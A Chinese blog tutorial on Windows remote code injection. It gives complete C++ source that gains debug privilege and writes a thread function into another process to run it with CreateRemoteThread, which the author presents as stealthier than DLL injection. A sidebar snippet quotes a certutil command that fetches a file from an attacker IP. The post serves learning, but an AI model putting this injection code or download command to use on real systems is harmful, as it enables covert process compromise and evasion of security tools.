远程代码注入

最新推荐文章于 2024-05-24 09:56:34 发布
最新推荐文章于 2024-05-24 09:56:34 发布
阅读量976 收藏
点赞数
分类专栏: 二进制
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Joliph/article/details/80503036
版权

TIPS
1.
之前写进程隐藏的时候写了个dll注入工具,这个工具会想目标进程写入dll名称,然后利用loadlirary加载dll。如何让那个程序调用loadlirary的呢?是用了CreateRemoteThread这个函数,翻译过来就是创建远程线程,为什么微软要提供一个这样的函数呢?其实并不是微软特地提供的给我们注入的API,这个API的实际作用其实是创建远程线程,创建的线程原型是DWORD WINAPI ThreadProc(LPVOID lparam),只有一个参数,且参数是指向任意内容的指针,而loadlirary函数的原型是HMODULE WINAPI LoadLibrary( LPCTSTR lpFileName),可以看出来他们两个非常接近,都是1个参数,那个参数都是指针,所以这个函数就被开发为注入dll的API,且不会出错,符合语法,但是运行的线程函数被替换为LoadLibrary函数,然后运行线程=加载dll,随后dllmain里面运行各种代码。
2.
但其实这种方式不够隐蔽,因为你在程序中加载了DLL,这么大的动静被检测的几率就会很大,而且你既然有dll实体那么被云端响应的速度也会很快,换句话说,这种注入dll的方式很容易被拦截
3.
其实我们可以利用CreateRemoteThread函数的原本的功能,即直接运行ThreadProc,而这个ThreadProc函数的代码通过WriteProcessMemory的方式写入,函数的参数lparam所指向的内容也采用同样的方式写入即可,这样调用CreateRemoteThread就会直接运行我们写入的ThreadProc函数
4.
在ThreadProc函数中调用API的时候我们不确定我们注入的程序有没有加载含有这个API的DLL,所以我们一般需要调用什么API都要给他加入LoadLibrary,去加载这个api的dll
5.
逆向工程核心原理中的ThreadProc有LoadLibrary加上调用GetprocAddress之后再动态调用MessageBoxA这一步,感觉又复杂又没啥必要,直接给他传入MessageBoxA的地址即可,经测试没有问题
6.
调用重要API的时候有一个参数需要知道ThreadProc整个函数的大小,这里巧妙地使用(DWORD)ThreadProc-(DWORD)Code_Inject计算得到,可以想象一下,这两个函数是紧挨着的,且编写的时候ThreadProc在Code_Inject后面,是不是这样就能得到ThreadProc的大小了?如果还是不知道的话调试一下即可

CodeInject.h

#include "windows.h"
#include <iostream>
using namespace std;


//*******************************Params定义*****************************************
typedef struct _THREAD_PARAM{
    FARPROC pFunc[2];
    char szbuf[2][128];
}THREAD_PARAM,*PTHREAD_PARAM;


//*******************************Windows API定义*****************************************
typedef HMODULE (WINAPI *PFLOADLIBRARY)(LPCSTR lpLibFileName);   //LoadLibrary()

typedef int (WINAPI *PFMESSAGEBOXA)(HWND hwnd,LPCSTR lptext,LPCSTR lpcaption,UINT utype);   //MessageBoxA()

DWORD WINAPI ThreadProc(LPVOID lparam);       //injected-thread

BOOL EnableDebugPrivilege();       //提权函数

void Code_Inject();                //代码注入函数

CodeInject.cpp

#include "CodeInject.h"


DWORD Inject_Pid=0;
THREAD_PARAM param={0,};

int main(){
    cout<<"plz input pid you want to inject"<<endl;
    cin>>Inject_Pid;
    LoadLibraryA("user32.dll");
    //****************************设置Params参数*********************************
    HMODULE hmod1=GetModuleHandleA("kernel32.dll");
    HMODULE hmod2=GetModuleHandleA("user32.dll");
    param.pFunc[0]=GetProcAddress(hmod1,"LoadLibraryA");  //确保user32.dll已加载
    param.pFunc[1]=GetProcAddress(hmod2,"MessageBoxA");   //调用MessageBoxA
    strcpy_s(param.szbuf[0],"user32.dll");                //LoadLibraryA的参数
    strcpy_s(param.szbuf[1],"Injected");                  //MessageBoxA的参数
    //****************************设置Params完成*********************************

    Code_Inject();

    return 0;
}


void Code_Inject(){
    if(!EnableDebugPrivilege()){                                               //提权
        cout<<"EnableDebugPrivilege Failed";
        system("pause");
        return;
    }
    HANDLE hprocess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,Inject_Pid);           //获取进程句柄
    LPVOID param_address=VirtualAllocEx(hprocess,NULL,sizeof(THREAD_PARAM),MEM_COMMIT,PAGE_READWRITE);     //申请存放param的空间
    LPVOID ThreadProc_address=VirtualAllocEx(hprocess,NULL,(DWORD)ThreadProc-(DWORD)Code_Inject,MEM_COMMIT,PAGE_READWRITE);//申请存放ThreadProc的空间,ThreadProc大小通过Code_Inject-ThreadProc取得(注意这里不能为负数?)
    WriteProcessMemory(hprocess,param_address,(LPVOID)&param,sizeof(THREAD_PARAM),NULL);     //写入param
    WriteProcessMemory(hprocess,ThreadProc_address,(LPVOID)ThreadProc,(DWORD)ThreadProc-(DWORD)Code_Inject,NULL);     //写入ThreadProc
    HANDLE hthread=CreateRemoteThread(hprocess,NULL,0,(LPTHREAD_START_ROUTINE)ThreadProc_address,param_address,0,NULL);   //创建ThreadProc线程
    WaitForSingleObject(hthread,INFINITE);
    CloseHandle(hthread);
    CloseHandle(hprocess);
}
DWORD WINAPI ThreadProc(LPVOID lparam){
    PTHREAD_PARAM pParam=(PTHREAD_PARAM)lparam;
    ((PFLOADLIBRARY)pParam->pFunc[0])(pParam->szbuf[0]);  //LoadLibraryA("user32.dll")
    ((PFMESSAGEBOXA)pParam->pFunc[1])(NULL,pParam->szbuf[1],pParam->szbuf[1],NULL);  //MessageBoxA(NULL,"Injected","Injected",NULL);
    return 0;
}

BOOL EnableDebugPrivilege(){
    HANDLE hToken;
    BOOL fOk=FALSE;
    if(OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)){ //Get Token
        TOKEN_PRIVILEGES tp;
        tp.PrivilegeCount=1;
        if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid))//Get Luid
            cout<<"Can't lookup privilege value"<<endl;
        tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;//这一句很关键,修改其属性为SE_PRIVILEGE_ENABLED
        if(!AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL))//Adjust Token
            cout<<"Can't adjust privilege value"<<endl;
        fOk=(GetLastError()==ERROR_SUCCESS);
        CloseHandle(hToken);
        hToken=NULL;
    }
    return fOk;
}
Istaroth
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
远程代码注入器 CALL调用示例分析
07-08
CALL调用示例分析-远程代码注入器 CodeInEX_dong代码注入 CodeInEX_dong代码注入
远程代码注入新技术详解
zzz822163的专栏
11-06 632
我研究出了一种新的在远程进程中执行代码的可能性,就是利用一个未文档函数在远程进程地址空间写入代码,并且用一种新的技术在远程进程中执行它,这种技术完全工作在用户模式下,并且不需要特殊的条件比如像管理员权限或者之类的要求。让源码说明一切:(我为我的英文水平感到抱歉,我来自德国) 复制内容到剪贴板 代码:#define _WIN32_WINNT 0x0400#include typedef LONG
**PowerLoaderEx:强大的跨平台代码注入工具**
最新发布
gitblog_00078的博客
05-24 215
PowerLoaderEx:强大的跨平台代码注入工具 项目地址:https://gitcode.com/BreakingMalware/PowerLoaderEx 1、项目介绍 PowerLoaderEx是一个先进的代码注入工具,专为x32和x64架构设计。这个开源项目源自于大约2013年被广泛使用的PowerLoader,在恶意软件家族中如Gapz、Redyms、Carberp和Vabushky...
RCE命令注入
m0_75178803的博客
06-18 520
a=certutil -urlcahce -split -f http://192.168.160.135(攻击机)/1.txt 2.php。certutil -urlcache -split -f http://192.168.160.135(攻击机)/1.txt 2.php。在靶机(192.168.31.187)下的1.php查看上传的攻击机(192.168.160.135)中的2.php文件。漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入
C语言实现远程代码注入
weixin_30239339的博客
06-21 759
#include <windows.h> #include <iostream> #define STRLEN 20 typedef struct _DATA { DWORD dwLoadLibrary; DWORD dwGetProcAddress; DWORD dwGetModuleHandle; DWORD dw...
InjLib-一个为所有Windows版本实现远程代码注入的库
04-08
《InjLib:Windows平台下的远程代码注入详解》 InjLib是一个强大的库,专为在各种Windows操作系统上实现远程代码注入而设计。本文将深入探讨InjLib的原理、功能及其应用,同时也会涉及相关的编程语言和技术,如...
远程注入代码
04-04
在这个场景中,"远程注入"指的是在不修改目标程序的情况下,将自定义代码注入到运行中的游戏进程中,从而实现对游戏功能的操控或增强。这种技术在游戏外挂中被广泛应用,但同时也可能被滥用,对游戏公平性和网络安全...
远程线程注入工具,可生成代码 可自定义shellcode注入进程-易语言
06-14
双击第三个输入框即可生成shellcode,这里默认的shellcode是远程线程注入 注入的是当前程序选择注入的进程 这里选择最左下角的选项,然后再双击输入框 即可生成在自身程序执行的shellcode 这里说明一下哈,这里是...
使用远程线程注入DLL
08-04
远程线程注入是一种技术,主要用于在另一个进程的上下文中执行代码。这种技术在软件开发、调试、自动化测试以及恶意软件中都有应用。本篇将详细解释远程线程注入的概念、工作原理,以及如何通过代码实现。 远程线程...
windows-CODE注入远程线程注入
08-14
windows-CODE注入远程线程注入) 整理代码
汇编代码远程注入
12-31
逆向调试的时候用的 汇编代码远程注入 写游戏辅助必备
代码注入的三种方法
xumaojun的专栏
08-31 2134
http://www.vckbase.com/index.php/wv/1580   目录 Windows 钩子 CreateRemoteThread 和 LoadLibrary 技术 ――进程间通信 CreateRemoteThread 和 WriteProcessMemory 技术 ――如何用该技术子类化远程控件 ――何时使用 CreateRemoteThread
实现远程代码注入
其疾如风 其徐如林 侵略如火 不动如山
08-28 1370
前面我写过DLL的注入代码(详见:DLL注入与卸载),但是也并非就一定要另外实现一个动态链接库再注入我们的所需操作。这次我们就直截了当一点,直接在目标进程中注入我们所需的代码来实现操控。 要在目标进程中完成一定的功能,当然需要调用相关的API函数了,只是这次我们要使用的API出现在不同的DLL中。Kernel32.dll文件在每个进程中的地址是相同的,但这并不代表其他DLL文件在每个进程中的地址
利用CreateRemoteThread 实现远程代码注入的例子!!
jangdong的专栏
07-05 2078
#include "stdafx.h"#include &lt;windows.h&gt;#include &lt;stdlib.h&gt;#include &lt;stdio.h&gt;void CheckError ( int, int, char *); //出错处理函数PDWORD pdwThreadId; HANDLE hRemoteThread, hRemoteProcess;DWOR...
远程注入代码
l460602540的专栏
03-19 1842
// InjectCode.cpp : 定义控制台应用程序的入口点。 #include "stdafx.h" #include typedef struct _REMOTE_PARAMETER { CHAR m_msgContent[MAX_PATH]; CHAR m_msgTitle[MAX_PATH]; DWORD m_dwMessageBoxAddr; }Remot
命令注入远程代码执行
u011975363的专栏
07-02 341
远程代码执行:调用服务器网站代码进行执行 命令注入:调用操作系统命令进行执行
远程注入
weixu_2008的专栏
09-24 881
原文转自:http://lujuns.spaces.live.com/blog/cns!29d3b1627d1efea1!232.entry近日在做一软件汉化工作时,由于原软件的标题在程序内部会根据运行状态发生变化,且其中的Tab Contrl控件的标签也是由代码写死的,无法使用资源编辑器进行修改,而且当时没有找到合适的工具来对PE文件进行修改,而且这种方法由于没有做过没有经验,难以保证原有系
fastjson远程代码注入特征防御
07-28
然而,由于fastjson的某些特性,存在远程代码注入的安全风险。为了防止这种风险,以下是一些特征防御的建议: 1. 更新fastjson版本:及时更新fastjson库到最新版本,因为开发人员经常修复已知的安全漏洞。 2. 配置...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值